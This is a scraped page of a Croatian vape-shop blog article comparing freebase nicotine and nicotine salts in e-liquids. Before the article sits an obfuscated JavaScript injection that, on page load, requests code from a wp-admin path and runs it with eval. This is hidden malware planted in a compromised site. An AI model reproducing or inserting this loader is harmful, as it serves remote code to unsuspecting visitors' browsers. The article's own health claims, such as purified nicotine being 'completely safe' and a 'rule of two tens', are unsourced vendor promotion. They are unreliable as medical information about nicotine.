;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
Nikotin za e cigarete

Nikotin za e cigarete

Nikotin je glavni razlog zašto e cigarete postoje; naime, to je supstanca koja stvara ovisnost i zbog koje pušači ne mogu tek tako prestati pušiti kad god im padne na pamet. Naravno, prestanak pušenja je itekako moguć bez prelaska na elektronske cigarete, ali upravo su one sredstvo koje je do danas tisućama pušača diljem svijeta pomoglo odreći se analognih cigareta.

Prilikom izrade e tekućina koristi se jedan od dva oblika nikotina – pročišćeni nikotin te nikotinske soli, a mi ćemo sada objasniti u čemu je razlika te koji su plusevi i minusi obje vrste nikotina u parenju.

PROČIŠĆENI NIKOTIN (NIKOTIN SLOBODNE BAZE)

Ovaj oblik nikotina se obrađuje u dvije faze. Prva faza je kemijska obrada za ekstrakciju visokog prinosa kako bi se iz biljke izvuklo što više nikotina. Druga faza je pročišćavanje dobivene supstance.

U većini slučajeva, ekstrahirani nikotin je zapravo isti kao i onaj koji se koristi u insekticidnim bazama. On je veoma visoko koncentriran u proizvodima ekstrakcije, stoga ga je potrebno pročistiti kako bi bio prikladan za inhalaciju kod ljudi. On tada postaje takozvani farmaceutski nikotin, odnosno onaj koji sadrži najnižu moguću razinu stranih elemenata. Iako ovi uzastopni procesi imaju zaslugu pružiti nikotin visoke čistoće potpuno siguran za konzumaciju u obliku isparavanja, oni denaturiraju proizvod, što ima niz učinaka. Nikotin postaje nestabilan i razgrađuje se. Odmah valja naglasiti da sama priroda nikotina ostaje nepromijenjena te, primjerice, ne postoji mogućnost transformacije u otrovni spoj. S druge strane, ovaj proces utječe na njegove učinke. Ako je nikotin star i loše uskladišten, neće biti toliko učinkovit na receptorima mozga. Nikotin dobiven izgaranjem cigareta bliži je izvornom obliku od pročišćenog nikotina sadržanog u e-cigaretama. To je razlog je pročišćeni nikotin koji se trenutno najviše koristi kod osobnih isparivača mnogo manje učinkovit nego u prirodnom stanju. Ovu usporednu učinkovitost nastojimo sažeti u pravilo dva desetka: potrebno vam je 10 minuta isparavanja da biste postigli isti učinak kao i kod 10 sekundi duhana, strogo u smislu zadovoljstva namjenskih receptora u mozgu.

NIKOTINSKE SOLI

Izraz nikotinske soli donekle dovodi u zabludu; zapravo, one nisu u kristalnom obliku, već u tekućem. Izraz “soli” koristi se samo zato što je tvar alkaloid, tj. molekula na bazi dušika koja u svom potpuno razvijenom obliku tvori gorke soli. Zbog sličnosti s prirodnim nikotinom, nikotinske soli su stabilnije od pročišćenog nikotina. Ovo je njihova prva prednost: otporniji su i stoga više opraštaju u smislu kvalitete skladištenja. Posebno ih karakterizira blaži vaping doživljaj. Nikotinske soli izazivaju manju iritaciju od pročišćenog nikotina. Kao takvi, oni su idealan alat za vapere, osobito početnike, kojima je potrebna visoka doza nikotina, ali su skloni napadima kašlja. S druge strane, vaperima koji su već navikli na „throat hit“ koji daje pročišćeni nikotin ove soli mogu djelovati preslabo te zahtijevati veći postotak nikotina u samoj tekućini. Upravo se iz tog razloga nikotinske soli ne preporučuju vaperima koji koriste dl atomizere uz veliku snagu kako bi dobili najveće moguće oblake pare. Jednostavno rečeno, ukoliko ne osjećamo throat hit, a mnogo velikih oblaka uzastopce, vrlo se lako možemo predozirati nikotinom jer nismo svjesni koliko smo ga zapravo udahnuli.

Jeste li znali za ovo? Komentirajte u članku!

Posjetite naš Vaper Pub Youtube kanal za više zanimljivih informacija i videa.

Choose your Reaction!
Leave a Comment